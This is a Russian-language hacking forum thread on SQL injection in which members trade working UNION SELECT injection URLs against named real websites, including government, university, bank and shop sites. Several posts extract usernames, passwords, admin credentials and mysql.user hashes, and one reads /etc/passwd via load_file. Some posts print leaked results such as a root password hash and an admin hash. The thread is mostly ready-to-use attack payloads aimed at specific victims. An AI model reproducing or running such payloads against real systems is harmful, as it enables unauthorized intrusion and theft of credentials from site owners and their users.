SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    наверное MySql 3 версии.
     
  2. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://wristband.mobi/index.php?mode=productdetail&id=-465+union+select+1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16,username,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+users/*
     
  3. 1NtR0

    1NtR0 Elder - Старейшина

    Joined:
    14 Apr 2007
    Messages:
    235
    Likes Received:
    89
    Reputations:
    35
    Немного gov :

    Code:
    http://www.monitor-nhsft.gov.uk/publications.php?id=930+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
    Code:
    http://www.equestriancentre.nsw.gov.au/news_detail.php?id=-22+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
    Code:
    http://www.chubut.gov.ar/tramites/descripcion_imprimir.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
    Code:
    http://www.parl.gov.mn/detail.php?pid=-23+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
    Code:
    http://wildlife.utah.gov/watersheds/project/detailed.php?id=-680+union+select+1,2,user(),4/*
    Code:
    http://www.regattacentre.nsw.gov.au/print.php?id=-20+union+select+1,2,3,user(),5,version(),database(),8,9,10,11,12,13,14,15,16/*
    Code:
    http://gulin.nbyz.gov.cn/news_read.php?id=-2+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
    Code:
    http://www.bogota.gov.co/guia/interfaz/ciudadano/VIEW_tramite_print.php?id=-1+union+select+user()/*
     
  4. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    581
    Likes Received:
    205
    Reputations:
    37
    Code:
    http://www.dvgu.ru/news/shownews.phtml?a=show&id=3437+and+lower(user())=char(0x64,0x76,0x67,0x75,0x40,0x77,0x33,0x2e,0x64,0x76,0x67,0x75,0x2e,0x72,0x75)
    user: [email protected]
     
    1 person likes this.
  5. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    //

     
    1 person likes this.
  6. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    To 0nep@t0p. По поводу
    Тут действительно скуль 3 версии (точнее 32359). И иньекция возможна. Вот как удалось определить версию
    http://www.mosoblduma.ru/index.php?action=more&pid=13&id=395+/*!32359+AND+0+*/
    Помогла статья http://www.securitylab.ru/contest/212101.php - SQL инъекция в MySQL сервере третей версии.
    Но дальше не копал, мороки много если нужно колупай.
    З.Ы. Оказываеться не только UNION SELECT :)
     
  7. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.lancerregister.com/store_category.php?id=-17+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
     
  8. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    _http://www.a2k.org.ua/news.php?id=-1+union+select+1,2,3,4,password,user,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users+where+id=1/*
     
    2 people like this.
  9. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    Банк "Экспресс-Кредит"
    www.expr.ru

    Code:
    http://www.expr.ru/news2/?act=show_news&id=-1+union+select+1,2,version(),user(),5,6,7,8/*
     
  10. iv.

    iv. Elder - Старейшина

    Joined:
    21 Mar 2007
    Messages:
    1,183
    Likes Received:
    438
    Reputations:
    107
    Dominican University of California
     
    1 person likes this.
  11. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    магазин PIN-кодов

    Code:
    http://popolni.in.ua/shop.php?r=-1+union+select+1,2,3,concat(id,0x3a,pass,0x3a,name,0x3a,status),5,6,7+from+admins+limit+1,1/*
     
  12. iv.

    iv. Elder - Старейшина

    Joined:
    21 Mar 2007
    Messages:
    1,183
    Likes Received:
    438
    Reputations:
    107
    University of Nairobi // ну да, сегодня универы :(
    Подозрение
    Подбираем колонки
    Узнаем основную информацию
    Пятерка. Смотрим таблицы и колонки
    Выводим че-нить..
     
    1 person likes this.
  13. Philicio

    Philicio New Member

    Joined:
    27 Jul 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    club.azlk.ru

    http://club.azlk.ru/index.php3?mode=showcar&carid=-1+union+select+1,passwd,nick,4,5,6,7,8,9,10,name,12,13,14,15,16+from+users+limit+1,1
     
  14. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    _http://www.dubinushka.ru/m_files.php?ms_id=-54+union+select+1,concat(login,0x3a,pass)+from+users/*
     
  15. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    На сайтеге http://looperman.com/loops.php

     
  16. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    EDU:

    Code:
    http://ctbp.ucsd.edu/workshops/index.php?id=-18%27+union+select+1,version(),username,4,5,6,7,8,9,10,11,12,13,14+from+users/*
    Code:
    http://journalism.berkeley.edu/events/details.php?ID=397+union+select+1,2,3,4,5,6,7,8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/*
    Code:
    http://crca.ucsd.edu/views.php?id=-5+union+select+1,version(),concat_ws(0x3a,user,password)+from+mysql.user+limit+0,1/*
    stanford?
    Code:
    http://auroraforum.stanford.edu/events.php?id=-47+union+select+1,2,3,4,5,convert(user()+using+latin1),7,8,9,10,11,12,13,14,15,16+from+mysql.user/*
    root@localhost

    Code:
    http://auroraforum.stanford.edu/events.php?id=-47+union+select+1,2,3,4,5,convert(concat(user,0x3a,password)+using+latin1),7,8,9,10,11,12,13,14,15,16+from+mysql.user+limit+0,1/*
    root:*B8EE85A14FC4800165C57E0B7C18B2CBC1EE3EC8

    Code:
    http://auroraforum.stanford.edu/events.php?id=-47+union+select+1,2,3,4,5,convert(load_file('/etc/passwd')+using+latin1),7,8,9,10,11,12,13,14,15,16+from+mysql.user+limit+0,1/*
    /etc/passwd
     
    #2796 Dr.Frank, 1 Aug 2007
    Last edited: 1 Aug 2007
  17. l0bzik

    l0bzik New Member

    Joined:
    31 Jul 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Мой первый пост (вроде не боян):
    http://www.ourpeople.ru/db.cgi?p=671'

    ну тут все тривиально и неинтересно....

    http://www.ourpeople.ru/db.cgi?p=-1%20union%20select%20ID,null,null,null,null,null,Name,NickName,null,null,password%20as%20WWWPage,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20Users%20WHERE%20ID IN (1602)
    - ибо знак "=" рвет запрос
     
  18. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    http://www.xewb.com/
    Code:
    http://www.xewb.com/show_cat.php?cat_id=-1+union+select+1,concat_ws(login,0x3a,password)+from+dir_login/*
    Load_File работает, ибо рут, как ни странно, имеет File_Priv. :)

    user: root@localhost
    database: xewbcom_dbroot@localhost
    version: [email protected]

    User&Pass: 4admin:01f8f7cdac8b238f7db655246a8aa894
     
    1 person likes this.
  19. Dagon

    Dagon Elder - Старейшина

    Joined:
    27 Mar 2006
    Messages:
    57
    Likes Received:
    24
    Reputations:
    8
    skidmore.edu

    Code:
    http://www.skidmore.edu/academics/art/artimages/image.php?id=-1%20UNION%20SELECT%201/*
    (появляется изображение > смотрим исходный код)

    Load_File() работает

    user:root@localhost

    dukemednews.duke.edu

    http://dukemednews.duke.edu/news/article.php?id=-1%20UNION%20SELECT%201,2,3,44444,DATABASE(),6,USER(),55/*
     
    #2799 Dagon, 2 Aug 2007
    Last edited: 2 Aug 2007
    1 person likes this.
  20. _-Ramos-_

    _-Ramos-_ Banned

    Joined:
    4 Jan 2007
    Messages:
    174
    Likes Received:
    215
    Reputations:
    8
    http://www.pubstoronto.com
    Code:
    http://www.pubstoronto.com/directory.php?cat=-1/**/UNION/**/ALL%20SELECT/**/1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11,12,13,14/**/FROM/**/admin/*
     
Thread Status:
Not open for further replies.